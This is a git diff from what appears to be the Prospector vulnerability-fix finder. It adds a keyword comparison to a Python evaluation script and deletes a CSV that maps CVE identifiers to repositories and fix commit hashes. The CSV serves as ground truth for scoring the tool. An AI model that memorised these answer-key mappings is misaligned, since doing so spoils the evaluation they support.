report2["advisory_record"]["keywords"], ) - if not same_commits_diff_order: - relevance_sum1 = _sum_relevance(report1["commits"]) - relevance_sum2 = _sum_relevance(report2["commits"]) - cve_info["same relevance sum"] = ( - relevance_sum1 == relevance_sum2 + cve_info["different keywords"] = different_keywords + + if not different_keywords: + commits1 = [ + commit["commit_id"] + for commit in report1["commits"] + ] + commits2 = [ + commit["commit_id"] + for commit in report2["commits"] + ] + same_commits_diff_order = _compare_commits( + commits1, commits2 + ) + cve_info["same commits, ordered differently"] = ( + same_commits_diff_order ) + if not same_commits_diff_order: + relevance_sum1 = _sum_relevance( + report1["commits"] + ) + relevance_sum2 = _sum_relevance( + report2["commits"] + ) + cve_info["same relevance sum"] = ( + relevance_sum1 == relevance_sum2 + ) + transitions[f"{cat1} to {cat2}"].append({cve: cve_info}) adjustments[cat1] -= 1 adjustments[cat2] += 1 @@ -435,6 +443,10 @@ def _compare_references(refs1, refs2): return refs1 != refs2 +def _compare_keywords(keyws1, keyws2): + return set(keyws1) != set(keyws2) + + def _get_symmetric_difference(list1: list, list2: list, ignore: list): """Returns two lists: the first containing elements that are only in list1 but not in list2 and the second one vice versa. diff --git a/prospector/evaluation/data/input/d63.csv b/prospector/evaluation/data/input/d63.csv deleted file mode 100644 index c5f208544..000000000 --- a/prospector/evaluation/data/input/d63.csv +++ /dev/null @@ -1,1320 +0,0 @@ -ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS -CVE-2009-0217;https://github.com/mono/mono;None:None;False;b79738dc7f734a78039567ea35f4e6a7d319a227,e2be4afec1d41aacd7c0a35605e369a55c4fe3a6,939994df00fc3e1372b9dc1243e261e2f6c6c133,c20551c1942db667672b36a07856467caace2d92,8bb489774f42a734947859a1742ee5710efd9b49,c48fa75d0c8f8e16a554de988cbadcb298fce013,cbfbf2f522399692d0edf7741746e300453338ca,3b1cee23d6f2f69f8444a5a1def4051028abff5f,14846e6f2f0c8e95b3eec525ee9367bcd0; -CVE-2010-0156;https://github.com/puppetlabs/puppet;None:None;False;0aae57f91dc69b22fb674f8de3a13c22edd07128,6111ba80f2c6f6d1541af971f565119e6e03d77d; -CVE-2010-0684;https://github.com/apache/activemq;None:None;False;1f464b9412e1b1c08d40c8ffac40edd52731da48,fed39c3619825bd92990cf1aa7a4e85119e00a6e,2895197d0dad246757d8d1d9eea181cbf0543ae9,9dc43f3ffe85c9c56faee235a21f23bfceb865c8; -CVE-2010-2076;https://github.com/apache/cxf;None:None;False;63a0a674a46aa24bf020bcb3d9e71bc0ad130c64,fec9e63fda69a3ef21679cd811efa2a0c100ce95; -CVE-2010-2245;https://github.com/apache/attic-wink;None:None;False;531771e5b2bf2f470fe728efe25e471d3b23659f; vulnerable tag is fixed -CVE-2010-4534;https://github.com/django/django;None:None;False;17084839fd7e267da5729f2a27753322b9d415a0,85207a245bf09fdebe486b4c7bbcb65300f2a693,732198ed5c2a127249970e0cd4218d093a38e9a2; -CVE-2010-4535;https://github.com/django/django;None:None;False;6819be1ea17ace34ae3a5c31ab0be960e99fcb85,d5d8942a160685c403d381a279e72e09de5489a9,7f8dd9cbac074389af8d8fd235bf2cb657227b9a; -CVE-2010-5142;https://github.com/chef/chef;None:None;False;2810e43ca6c05046a9ba1392fd8163c3e617ddc1,8d6de424c7ed977b3c7f232b585ef7d63647ac51; -CVE-2010-5312;https://github.com/jquery/jquery-ui;None:None;False;7e9060c109b928769a664dbcc2c17bd21231b6f3; -CVE-2011-1772;https://github.com/apache/struts;None:None;False;885ab3459e146ff830d1f7257f809f4a3dd4493a; vulnerable tag is fixed -CVE-2011-1950;https://github.com/plone/plone.app.users;None:None;False;282ca1eb510aea43bcddf6ad005446074d29efc3; -CVE-2011-2730;https://github.com/spring-projects/spring-framework;None:None;False;9772eb8410e37cd0bdec0d1b133218446c778beb,62ccc8dd7e645fb91705d44919abac838cb5ca3f; fixed tag is vulnerable v3.2.0.RELEASE is the first containing the fix in theory -CVE-2011-2732;https://github.com/spring-projects/spring-security;None:None;False;f5fbda42e5f494f1a8aa96a0f8b35d60a4f57556,a087e828a63edf0932e4eecf174cf816cbe6a58a,5238ba0e2615ef733a906b264c6c06a4446a886b; -CVE-2011-2765;https://github.com/irmen/Pyro3;None:None;False;554e095a62c4412c91f981e72fd34a936ac2bf1e; -CVE-2011-2929;https://github.com/rails/rails;None:None;False;5f94b93279f6d0682fafb237c301302c107a9552,e0c03f8a2e727619c1eb1822d100d8c920d8bf12,09ad48f22e0b32b6485bc122f7f220045aed1198; -CVE-2011-2930;https://github.com/rails/rails;None:None;False;8a39f411dc3c806422785b1f4d5c7c9d58e4bf85,f9b642cb15d37c9fc76c98ba4c11fa181b730178,fb4747bcf1659a94d76ac221d66ce44148ca7b49,6b46d655978ace0a6cfa6ad8b814d97c86a8830f; -CVE-2011-2931;https://github.com/rails/rails;None:None;False;586a944ddd4d03e66dea1093306147594748037a,3480d97b6c9f657ca1d0f11ac1e3e17baf84cdb2,66c3e31dcf314ab0fcabe717576d0b606c685d0e,60f783d9cedb151230074c216b338267e288d72d; -CVE-2011-2932;https://github.com/rails/rails;None:None;False;bfc432574d0b141fd7fe759edfe9b6771dd306bd,a19ee5cfd35fe85fd065be30de5af6b20363b682; -CVE-2011-3186;https://github.com/rails/rails;None:None;False;11dafeaa7533be26441a63618be93a03869c83a9; -CVE-2011-3848;https://github.com/puppetlabs/puppet;None:None;False;fe2de817b43a427a3c6fd629c5e13949b222ac34,c275a518d10bc9ef87d330c052cdc3d6f4241942,47135fbea8004f49c3255ae2052cb2357b325300; -CVE-2011-3869;https://github.com/puppetlabs/puppet;None:None;False;7d4c169df84fc7bbeb2941bf995a63470f71bdbd,2775c21ae48e189950dbea5e7b4d1d9fa2aca41c,e7a69952c052e89acc5b57a51ac0680a7a9a5977; -CVE-2011-3870;https://github.com/puppetlabs/puppet;None:None;False;b29b1785d543a3cea961fffa9b3c15f14ab7cce0,88512e880bd2a03694b5fef42540dc7b3da05d30; -CVE-2011-3871;https://github.com/puppetlabs/puppet;None:None;False;d76c30935460ded953792dfe49f72b8c5158e899,343c7bd381b63e042d437111718918f951d9b30d; -CVE-2011-3872;https://github.com/puppetlabs/puppet;None:None;False;94345ebac6d79a890efc5f49e136c4f76ddda3ef,bab9310d2800dd3c24e002f9d85c808ee38c9d3c,e4ee7947fd58e4fc49c5bce484cce7b5f60470ae,9ee12151e9c83d2b477ea5b04dd7d52e749a6992; -CVE-2011-3923;https://github.com/apache/struts;None:None;False;2c1eb6bb57f90db7287fc3ed0086793d0a43fe9e; -CVE-2011-4030;https://github.com/plone/Products.CMFEditions;None:None;False;d55add52e5900967c8cc78becc6790048f02015b; -CVE-2011-4104;https://github.com/django-tastypie/django-tastypie;None:None;False;e8af315211b07c8f48f32a063233cc3f76dd5bc2,be245106125961a322f935195c1d3bca6f978bfe; -CVE-2011-4461;https://github.com/eclipse/jetty.project;None:None;False;085c79d7d6cfbccc02821ffdb64968593df3e0bf; -CVE-2011-4838;https://github.com/jruby/jruby;None:None;False;f007944b459e7c5e33b8296433d8b9d704bf02cc,cc77504eda2546a36d3ca45d30e9dc3cc7a38bf6,c1c9f95ed29cb93806fbc90e9eaabb9c406581e5; -CVE-2011-5036;https://github.com/rack/rack;None:None;False;5b9d09a81a9fdc9475f0ab0095cb2a33bf2a8f91,e8fb5045fd9a28386425975b57414d46471a5263,09c5e53f11a491c25bef873ed146842f3cd03228,bf4b55ccfbe53f967d0bd52807eeb499ff4f9654; -CVE-2011-5097;https://github.com/chef/chef;None:None;False;a4ea6edab2fecb922f999cffb0daa04eeeec7a26,4402493061cdce76495d2408c8a9331c530c6cbf; -CVE-2011-5098;https://github.com/chef/chef;None:None;False;33f0e9c58bbf047e1b401a834f3abfe72d9a8947,7a09597360c256f6164047b62782a2a1e0a3d68a; -CVE-2012-0392;https://github.com/apache/struts;None:None;False;b4265d369dc29d57a9f2846a85b26598e83f3892,5f54b8d087f5125d96838aafa5f64c2190e6885b; vulnerable tag is fixed -CVE-2012-0394;https://github.com/apache/struts;None:None;False;b4265d369dc29d57a9f2846a85b26598e83f3892,5f54b8d087f5125d96838aafa5f64c2190e6885b; vulnerable tag is fixed -CVE-2012-0881;https://github.com/apache/xerces2-j;None:None;False;992b5d9c24102ad20330d36c0a71162753a37449; -CVE-2012-1054;https://github.com/puppetlabs/puppet;None:None;False;146953861e007a91545fdbd0ea59ab3509326e09,0c967037ec8305aceb81f0a3e5d2969054bce2e2; -CVE-2012-1098;https://github.com/rails/rails;None:None;False;9435f5a479317458c558ae743b7d876dd5a5db20,d1fc35fe196ee2913bc34e5c581a5284610d05d1,c60c1c0812d5eb55e7024db350f8bc5b6729f7fe; -CVE-2012-1099;https://github.com/rails/rails;None:None;False;1be2bbec310ffe94061cca7ba0e3c1a478af03af,7b73913701ff41981d166ca457e41690aac3bce3,5b4082fddf3412aef6c085fbb2a13fd3bbc75f4e; -CVE-2012-1109;https://github.com/pediapress/mwlib;None:None;False;aa987c281c10e29f26aa0faa21c04f3bb1167fde; -CVE-2012-1176;https://github.com/pediapress/pyfribidi;None:None;False;d2860c655357975e7b32d84e6b45e98f0dcecd7a; -CVE-2012-1906;https://github.com/puppetlabs/puppet;None:None;False;c51447dfa81c9751fdc7663e0e91a9c9238abcaa,46e8dc06aa31426ec3bf5203e46107d72a9ba398; -CVE-2012-1986;https://github.com/puppetlabs/puppet;None:None;False;0d6d29933e613fe177e9235415919a5428db67bc,568ded50ec6cc498ad32ff7f086d9f73b5d24c14; -CVE-2012-1987;https://github.com/puppetlabs/puppet;None:None;False;91e7ce478649490d87684661f79d70b5ca46ddd0,568ded50ec6cc498ad32ff7f086d9f73b5d24c14,0d6d29933e613fe177e9235415919a5428db67bc; -CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e; -CVE-2012-2139;https://github.com/mikel/mail;None:None;False;29aca25218e4c82991400eb9b0c933626aefc98f,ac56f03bdfc30b379aeecd4ff317d08fdaa328c2; -CVE-2012-2378;https://github.com/apache/cxf;None:None;False;9bb4612d3352ef3e3292fdce25e3c70b43d63c6f; -CVE-2012-2379;https://github.com/apache/cxf;None:None;False;440528d928be1e2030e7227b958c9c072847d9b2,4500bf901cb2a7312291b6663045f28a95d2a0c4; -CVE-2012-2417;https://github.com/Legrandin/pycrypto;None:None;False;9f912f13df99ad3421eff360d6a62d7dbec755c2; -CVE-2012-2660;https://github.com/rails/rails;None:None;False;060c91cd59ab86583a8f2f52142960d3433f62f5,5b83bbfab7d5770ed56366d739ff62ac70425008,dff6db18840e2fd1dd3f3e4ef0ae7a9a3986d01d; -CVE-2012-2661;https://github.com/rails/rails;None:None;False;9340f89849606dba02f44038171f3837f883fd4e,99f030934eb8341db333cb6783d0f42bfa57358f,b71d4ab9d7d61ebe3411a8754e9fe93d3587704e,71f7917c553cdc9a0ee49e87af0efb7429759718,176af7eff2e33b331c92febbeda98123da1151f3,8355abf153615a717c0d0e4a58b2bfca39b35025,cc2903da9f13c26ba3d94c149f31d4c53b94b2ed; -CVE-2012-3366;https://github.com/Bcfg2/bcfg2;None:None;False;a524967e8d5c4c22e49cd619aed20c87a316c0be; -CVE-2012-3408;https://github.com/puppetlabs/puppet;None:None;False;ab9150baa1b738467a33b01df1d90e076253fbbd; -CVE-2012-3451;https://github.com/apache/cxf;None:None;False;deeeaa95a861b355068ca6febc7aa02a4a8c51e5,878fe37f0b09888a42005fedc725ce497b5a694a,7230648f96573820d5bfa82c92c637391b448897,9c70abe28fbf2b4c4df0b93ed12295ea5a012554; -CVE-2012-3458;https://github.com/bbangert/beaker;None:None;False;91becae76101cf87ce8cbfabe3af2622fc328fe5; -CVE-2012-3536;https://github.com/apache/james-hupa;None:None;False;aff28a8117a49969b0fc8cc9926c19fa90146d8d; -CVE-2012-3865;https://github.com/puppetlabs/puppet;None:None;False;d80478208d79a3e6d6cb1fbc525e24817fe8c4c6,554eefc55f57ed2b76e5ee04d8f194d36f6ee67f; -CVE-2012-3867;https://github.com/puppetlabs/puppet;None:None;False;f3419620b42080dad3b0be14470b20a972f13c50,bd2820ec6ee8a45f57fcc57f79dddde0062cdca7,4d7c9fd9f65c6daaf47515d2faec90b448e3821d,dfedaa5fa841ccf335245a748b347b7c7c236640,0144e687b663a9ae170a4cdb55f8dcc1571128ea,9607bd784b2f04b759932d36e843ba42d82635f1; -CVE-2012-4386;https://github.com/apache/struts;None:None;False;a1ca307981b0930d1687ed89f0b7305af79da0f3,1081c52be93abfd2f33ba8453c676e3edcedec8b; one commit outside time interval, other not included in the tag, use STRUTS_2_3_4_1 -CVE-2012-4387;https://github.com/apache/struts;None:None;False;87935af56a27235e9399308ee1fcfb74f8edcefa,80e03182d66d9e6ab18f9a9a9b3c42725a1c89e9; one commit outside time interval, other not included in the tag, use STRUTS_2_3_4_1 -CVE-2012-4449;https://github.com/apache/hadoop;None:None;False;2847693311ed09aa9440a6157f1a8c072d50ca2e,38ec8babda50215f984e5f5532ae70918af77378,d6b7f10438677507fbe1adadec28d219889eab5b; -CVE-2012-4520;https://github.com/django/django;None:None;False;9305c0e12d43c4df999c3301a1f0c742264a657e,b45c377f8f488955e0c7069cad3f3dd21910b071,92d3430f12171f16f566c9050c40feefb830a4a3; -CVE-2012-5055;https://github.com/spring-projects/spring-security;None:None;False;f5fc94e1be40f3a62dd5a8687e4cfd5fe2130dea,915b2acf73a75c4e51e67a3c7fd85f908df6259b,c076f0f2e190c73a17379d05935c2c81657adee9; -CVE-2012-5633;https://github.com/apache/cxf;None:None;False;1a6b532d53a7b98018871982049e4b0c80dc837c,db11c9115f31e171de4622149f157d8283f6c720,d99f96aa970d9f2faa8ed45e278a403af48757ae,e733c692e933a7f82424d3744aace9304cd5d4f6,94a98b3fe9c79e2cf3941acbbad216ba54999bc0; -CVE-2012-5812;https://github.com/ACRA/acra;None:None;False;fff732595164baf233d911386a3965dc516cf081; -CVE-2012-6550;https://github.com/zeroclipboard/zeroclipboard;None:None;False;51b67b6d696f62aaf003210c08542588222c4913; -CVE-2012-6662;https://github.com/jquery/jquery-ui;None:None;False;5fee6fd5000072ff32f2d65b6451f39af9e0e39e,f2854408cce7e4b7fc6bf8676761904af9c96bde; -CVE-2012-6684;https://github.com/jgarber/redcloth;None:None;False;cddd03b87fe75b6681405066796bf4ef88b37149,b9bec13a245481f577c032a7df88513869b4d1b1,2f6dab4d6aea5cee778d2f37a135637fe3f1573c,39700cb12b2b882b1bd4900877d18059c31bbe04; -CVE-2012-6685;https://github.com/sparklemotion/nokogiri;None:None;False;599856367150709497a3a03bee930bd76504d95d,6d93d73498ed061dec5967d6471cd544c2b99a71,b2c28099ecb736d2fac4446fb062cfa20dd81d6f; -CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; -CVE-2013-0248;https://github.com/apache/commons-fileupload;None:None;False;f874563307c1159ac634df67509d9859bca6ddb9; -CVE-2013-0256;https://github.com/ruby/rdoc;None:None;False;ffa87887ee0517793df7541629a470e331f9fe60; -CVE-2013-0262;https://github.com/rack/rack;None:None;False;6f237e4c9fab649d3750482514f0fde76c56ab30,8de3c1d9902f8e64a385f38cf5711f26ffba19db,5c9b0de3d30971a36e953e6fed24e648daf3a68c; -CVE-2013-0263;https://github.com/rack/rack;None:None;False;9a81b961457805f6d1a5c275d053068440421e11,feea59c1abacd455c222bfee67541b1078378929,dcc7e6fa5106e1e8129f4bbe21f7e1607dbf5197,26c8500e9c49a0e625e1bd8d7158cabdfa2e17ae,aeb1c8d0fa1bfa21357cfe6d55898dedf3b337e1,0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07,a227999ab37cde072fa75495cd1d3bbcbcaf0474,6c39dfc8e8d8d631730449516cddb9b23a24337c,8748d492a4bc966de51f2ddf8edd498a3fa0e122,93abac98b13a0afa90293e4ec597cf505d46a343,471a37c15ad1b8b4a3bdfb190a5bf7aa770ec6d3; -CVE-2013-0285;https://github.com/savonrb/nori;None:None;False;818f5263b1d597b603d46cbe1702cd2717259e32,d9b68667249b98776fb23ba9e9c548dc4b524709,2ca6f8603e406f884a8fcea6bc26f8f6bf168f40; -CVE-2013-0294;https://github.com/pyradius/pyrad;None:None;False;38f74b36814ca5b1a27d9898141126af4953bee5; -CVE-2013-1607;https://github.com/pdfkit/pdfkit;None:None;False;ce37ffcdb223b34dd215971e2cd365e3a66cb5f1; -CVE-2013-1654;https://github.com/puppetlabs/puppet;None:None;False;be920acdb4762f6d813a29065ba210aef3ef612a,add9998c2f7c49c1eabf846566c0272a5f931f45,52be043933d40aab3449214f2aa602ceb214f91e; -CVE-2013-1800;https://github.com/jnunemaker/crack;None:None;False;e3da1212a1f84a898ee3601336d1dbbf118fb5f6; -CVE-2013-1801;https://github.com/jnunemaker/httparty;None:None;False;53a812426dd32108d6cba4272b493aa03bc8c031; -CVE-2013-1812;https://github.com/openid/ruby-openid;None:None;False;a3693cef06049563f5b4e4824f4d3211288508ed,be2bab5c21f04735045e071411b349afb790078f,3540a51e6f2f7fc7033f906fbd0a6c5153155e5a; -CVE-2013-1879;https://github.com/apache/activemq;None:None;False;148ca81dcd8f14cfe2ff37012fd1aa42518f02dc; -CVE-2013-1880;https://github.com/apache/activemq;None:None;False;fafd12dfd4f71336f8e32c090d40ed1445959b40; -CVE-2013-2013;https://github.com/openstack/python-keystoneclient;None:None;False;f2e0818bc97bfbeba83f6abbb07909a8debcad77; -CVE-2013-2035;https://github.com/fusesource/hawtjni;None:None;False;92c266170ce98edc200c656bd034a237098b8aa5; -CVE-2013-2115;https://github.com/apache/struts;None:None;False;fed4f8e8a4ec69b5e7612b92d8ce3e476680474b,d7804297e319c7a12245e1b536e565fcea6d6503; -CVE-2013-2132;https://github.com/mongodb/mongo-python-driver;None:None;False;a060c15ef87e0f0e72974c7c0e57fe811bbd06a2,842e675299318e02d8d223c458df87c029f66efc,7395ce72bf54ef64d723e1b4140556ebd12a2a07,d9b088e6d8a8b5f71acff10b6a13ba2b22fca718; -CVE-2013-2134;https://github.com/apache/struts;None:None;False;54e5c912ebd9a1599bfcf7a719da17c28127bbe3,01e6b251b4db78bfb7971033652e81d1af4cb3e0,cfb6e9afbae320a4dd5bdd655154ab9fe5a92c16,711cf0201cdd319a38cf29238913312355db29ba; -CVE-2013-2135;https://github.com/apache/struts;None:None;False;54e5c912ebd9a1599bfcf7a719da17c28127bbe3,01e6b251b4db78bfb7971033652e81d1af4cb3e0,cfb6e9afbae320a4dd5bdd655154ab9fe5a92c16,711cf0201cdd319a38cf29238913312355db29ba; -CVE-2013-2172;https://github.com/apache/santuario-java;None:None;False;a6795ec8148c1f91d8633694599ce34a5c06050d; -CVE-2013-2191;https://github.com/python-bugzilla/python-bugzilla;None:None;False;a782282ee479ba4cc1b8b1d89700ac630ba83eef; -CVE-2013-2254;https://github.com/apache/sling-org-apache-sling-servlets-post;None:None;False;57091b9bb7699fdc8dfb900b0e9b01bb0a848e4b,7ddd5df1282a47a99af1f7f4897fc7abe1ec056b; -CVE-2013-2275;https://github.com/puppetlabs/puppet;None:None;False;b9023b0c919312df648e424f392aa88c9b081599,a52013709b708ed346ea612f85e2b97d96fa66e2,e01e61e8909ec3ad4c873905a4dd9b952e3f4009,632e12d24d460b6dfd5cd3b65b2ad6397f2a2193; -CVE-2013-3300;https://github.com/lift/framework;None:None;False;099d9c86cf6d81f4953957add478ab699946e601; -CVE-2013-3567;https://github.com/puppetlabs/puppet;None:None;False;ce50d4ab992efdd1edd138d2a0eb6987213dcad1; -CVE-2013-4002;https://github.com/apache/xerces2-j;None:None;False;266e837852e0f0e3c8c1ad572b6fc4dbb4ded17b; -CVE-2013-4111;https://github.com/openstack/python-glanceclient;None:None;False;822cd64c0718b46a065abbb8709f6b466d12e708; -CVE-2013-4116;https://github.com/npm/npm;None:None;False;f4d31693e73a963574a88000580db1a716fe66f1; -CVE-2013-4152;https://github.com/spring-projects/spring-framework;None:None;False;7576274874deeccb6da6b09a8d5bd62e8b5538b7,434735fbf6e7f9051af2ef027657edb99120b173,2c030d4dcf4866bccc7a59d47398d6bc0de52ce2,3515acfa3db84bb62ef8ef8794a214c0d55fd47e; -CVE-2013-4204;https://github.com/gwtproject/gwt;None:None;False;4b1e5710d184205116e0e144b4501feb998e40b6; vulnerable tag is fixed -CVE-2013-4249;https://github.com/django/django;None:None;False;cbe6d5568f4f5053ed7228ca3c3d0cce77cf9560,90363e388c61874add3f3557ee654a996ec75d78,bfbae15c669beab335400ab51a060e3d7d8e4c7a; -CVE-2013-4251;https://github.com/scipy/scipy;None:None;False;bd296e0336420b840fcd2faabb97084fd252a973,27f8ed3839a74c2c9a92455ae5ab139d63201133,a05353d4511a1d86254d6b0a577d87c6715114e2; -CVE-2013-4286;https://github.com/apache/tomcat80;None:None;False;f0a7dc325201131ed31211c503c3a23714d8244f,bcce3e4997a4ed06fe03e2517443f3ad8ade2dfa,41b90b6ebc3e7f898a5a87d197ddf63790d33315; the two last commits were from tomcat standard repo, not tomcat80. Also not included in RC3 and RC2 is already fixed. -CVE-2013-4316;https://github.com/apache/struts;None:None;False;58947c3f85ae641c1a476316a2888e53605948d1; -CVE-2013-4322;https://github.com/apache/tomcat80;None:None;False;d85d0d1764259b62db0374f01df4bf6dddb12712,c806b2fc6b04ca4e928b3467d94f30f20c820d9d; vulnerable tag is fixed -CVE-2013-4353;https://github.com/openssl/openssl;None:None;False;197e0ea817ad64820789d86711d55ff50d71f631,8d65fdb62e517281350372775b5f93fcc8489681,2f972419a324761783e251dbdc735065bff88ac8; -CVE-2013-4413;https://github.com/zombocom/wicked;None:None;False;fe31bb2533fffc9d098c69ebeb7afc3b80509f53; -CVE-2013-4428;https://github.com/openstack/glance;None:None;False;a50bfbf490fd354d08abd25b67aaab83b2a17a85,feb735412021b771d4fe8b5706506abe6677899b,02e97689e60b643d446720659c9688702aea197b; if using 2013.2 shound find it. The 2013.1.4 tag is nowhere in the commits -CVE-2013-4477;https://github.com/openstack/keystone;None:None;False;c6800ca1ac984c879e75826df6694d6199444ea0,4221b6020e6b0b42325d8904d7b8a22577a6acc0,82dcde08f60c45002955875664a3cf82d1d211bc; -CVE-2013-4562;https://github.com/simi/omniauth-facebook;None:None;False;ccfcc26fe7e34acbd75ad4a095fd01ce5ff48ee7; -CVE-2013-4701;https://github.com/openid/php-openid;None:None;False;625c16bb28bb120d262b3f19f89c2c06cb9b0da9; -CVE-2013-4761;https://github.com/puppetlabs/puppet;None:None;False;a177c9d333b052c4d81d09ae2538bd5393612c69,13a3048994b19e22c13ac32da8eb15af5cfea954; commits have no tags -CVE-2013-5093;https://github.com/graphite-project/graphite-web;None:None;False;c198e5836970f0970b96498fcbe6fa83d90110cf,4a9f98647be279a39a982bd94922fdec710b0b3f; -CVE-2013-5123;https://github.com/pypa/pip;None:None;False;c2b799df9cd9bd9fcc124f6729d56b3180c813e8,3ef4ee4693db5e255dcfef1acf73427f6c97646b,dc559473e2667de130cd3ed4d57c4e125ee10d93; -CVE-2013-6044;https://github.com/django/django;None:None;False;1a274ccd6bc1afbdac80344c9b6e5810c1162b5f,ec67af0bd609c412b76eaa4cc89968a2a8e5ad6a,ae3535169af804352517b7fea94a42a1c9c4b762,79594b40c087c19fecc72af042c835b11a519b78; -CVE-2013-6235;https://github.com/stevensouza/jamonapi;None:None;False;05e6be6849abade047056c25ece23d9553deb3f3; -CVE-2013-6348;https://github.com/apache/struts;None:None;False;fd27e5cc748420a53d51e0e19a10efe8c582c2c0,01584fabc74635d63a1b2670f18d8fcd1ee046cc; -CVE-2013-6429;https://github.com/spring-projects/spring-framework;None:None;False;2ae6a6a3415eebc57babcb9d3e5505887eda6d8a,7387cb990e35b0f1b573faf29d4f9ae183d7a5ef; -CVE-2013-6430;https://github.com/spring-projects/spring-framework;None:None;False;f5c9fe69a444607af667911bd4c5074b5b073e7b,7a7df6637478607bef0277bf52a4e0a03e20a248; -CVE-2013-6465;https://github.com/kiegroup/jbpm-wb;None:None;False;4818204506e8e94645b52adb9426bedfa9ffdd04; -CVE-2013-7315;https://github.com/frankneusource/spring-framework;None:None;False;7576274874deeccb6da6b09a8d5bd62e8b5538b7,434735fbf6e7f9051af2ef027657edb99120b173; -CVE-2013-7370;https://github.com/senchalabs/connect;None:None;False;277e5aad6a95d00f55571a9a0e11f2fa190d8135,126187c4e12162e231b87350740045e5bb06e93a; -CVE-2013-7378;https://github.com/github/hubot-scripts;None:None;False;feee5abdb038a229a98969ae443cdb8a61747782; -CVE-2013-7397;https://github.com/AsyncHttpClient/async-http-client;None:None;False;df6ed70e86c8fc340ed75563e016c8baa94d7e72,dfacb8e05d0822c7b2024c452554bd8e1d6221d8; -CVE-2013-7398;https://github.com/AsyncHttpClient/async-http-client;None:None;False;a894583921c11c3b01f160ada36a8bb9d5158e96,bbdc1b3cc6ffc0eda0dd0ad54557db557ae937f7,fa056c572ab0c9b6edd05a7cc508898f35cc90d5,db6716ad2f10f5c2d5124904725017b2ba8c3434,3c9152e2c75f7e8b654beec40383748a14c6b51b; -CVE-2013-7459;https://github.com/pycrypto/pycrypto;None:None;False;8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4; -CVE-2014-0012;https://github.com/pallets/jinja;None:None;False;acb672b6a179567632e032f547582f30fa2f4aa7,964c61ce79f6748ff8c583e2eb12ec54082bf188; -CVE-2014-0014;https://github.com/emberjs/ember.js;None:None;False;d9977d62b26534555c0708acde0e7ae029e6d8ea,e52e047305849756c78abc1e760d621531c2c0a7,12fa46ba1c6efb9ddac7bfdef7f4f6909781c801,c80748313f93757b28f2bd3bd3d594e1e8e03d80,cc6cd6c1115e9f3f3ff2efa22dcb84080f7d4856,18f7d8a4159a707290ec9d09722aa4c39dfeb10a; -CVE-2014-0035;https://github.com/apache/cxf;None:None;False;5df3f72f1a26b7c9ac2888ab65e41f4105706580,2d2fd1bf67dc2247b6aca31b83a571d865fad1c9,d249721708694cbb0f431c0658166ebdcb02ec15; -CVE-2014-0050;https://github.com/apache/commons-fileupload;None:None;False;c61ff05b3241cb14d989b67209e57aa71540417a; -CVE-2014-0072;https://github.com/apache/cordova-plugin-file-transfer;None:None;False;a1d6fc07e8a40c1b2b16f4103c403b30e1089668; -CVE-2014-0073;https://github.com/apache/cordova-plugin-inappbrowser;None:None;False;26702cb0720c5c394b407c23570136c53171fa55; -CVE-2014-0075;https://github.com/apache/tomcat80;None:None;False;d49a03728ac7e3c800b1b0ce0eeccd8a5a21bb91,f646a5acd5e32d6f5a2d9bf1d94ca66b65477675,b6974571c122f6a1e7ec74a90fa212976fa7b0ed; -CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; -CVE-2014-0097;https://github.com/spring-projects/spring-security;None:None;False;88559882e967085c47a7e1dcbc4dc32c2c796868,a7005bd74241ac8e2e7b38ae31bc4b0f641ef973,7dbb8e777ece8675f3333a1ef1cb4d6b9be80395; -CVE-2014-0107;https://github.com/apache/xalan-j;None:None;False;52c27d504ced40719d243a8715d7f67d531723da,cbfd906cc5a1f1566fa1a98400c82e56077fae0c; -CVE-2014-0109;https://github.com/apache/cxf;None:None;False;f8ed98e684c1a67a77ae8726db05a04a4978a445,6dd839afbb4d834ed668738bd89e7775c1cf2f9d; -CVE-2014-0110;https://github.com/apache/cxf;None:None;False;8f4799b5bc5ed0fe62d6e018c45d960e3652373e,643b1bc7320ca90c3e078e50509f9a30a0ab45be,35cd29270b77b489cb23552637d66d47ce480f4c; -CVE-2014-0116;https://github.com/apache/struts;None:None;False;1a668af7f1ffccea4a3b46d8d8c1fe1c7331ff02; vulnerable tag is fixed -CVE-2014-0120;https://github.com/hawtio/hawtio;None:None;False;b4e23e002639c274a2f687ada980118512f06113; -CVE-2014-0121;https://github.com/hawtio/hawtio;None:None;False;5289715e4f2657562fdddcbad830a30969b96e1e; -CVE-2014-0160;https://github.com/openssl/openssl;None:None;False;96db9023b881d7cd9f379b0c154650d6c108e9a3; -CVE-2014-0177;https://github.com/github/hub;None:None;False;016ec99d25b1cb83cb4367e541177aa431beb600; -CVE-2014-0193;https://github.com/netty/netty;None:None;False;48edb7802b42b0e2eb5a55d8eca390e0c9066783,787a85f9f1b816ee901c1ec00348ae2007bb9d3b,8599ab5bdb761bb99d41a975d689f74c12e4892b,73b26b7c2598f36196b760ec590eefd37c8db62a,dfbd8e881980677bc21b5a53b80c8555061ffa84,cab1fa22ff43f604cc11631d5fccfa3e9231399a,93fab1d5a3a45a8104e560118930c1d652dce8cb; -CVE-2014-0224;https://github.com/openssl/openssl;None:None;False;bc8923b1ec9c467755cd86f7848c50ee8812e441,410a49a4fa1d2a1a9775ee29f9e40cbbda79c149,006cd7083f76ed5cb0d9a914857e9231ef1bc317; -CVE-2014-0225;https://github.com/spring-projects/spring-framework;None:None;False;44ee51a6c9c3734b3fcf9a20817117e86047d753,c6503ebbf7c9e21ff022c58706dbac5417b2b5eb,8e096aeef55287dc829484996c9330cf755891a1; -CVE-2014-0228;https://github.com/apache/hive;None:None;False;c3d7083b7605d1753946c4c4411e3a3241ea7ffe; 0.13.1 did not include the commit -CVE-2014-1202;https://github.com/SmartBear/soapui;None:None;False;6373165649ad74257493c69dbc0569caa7e6b4a6; -CVE-2014-1402;https://github.com/pallets/jinja;None:None;False;964c61ce79f6748ff8c583e2eb12ec54082bf188,acb672b6a179567632e032f547582f30fa2f4aa7; -CVE-2014-1403;https://github.com/oyvindkinsey/easyXDM;None:None;False;a3194d32c25a0d27a10a47304eb9c9be93ffbf13; 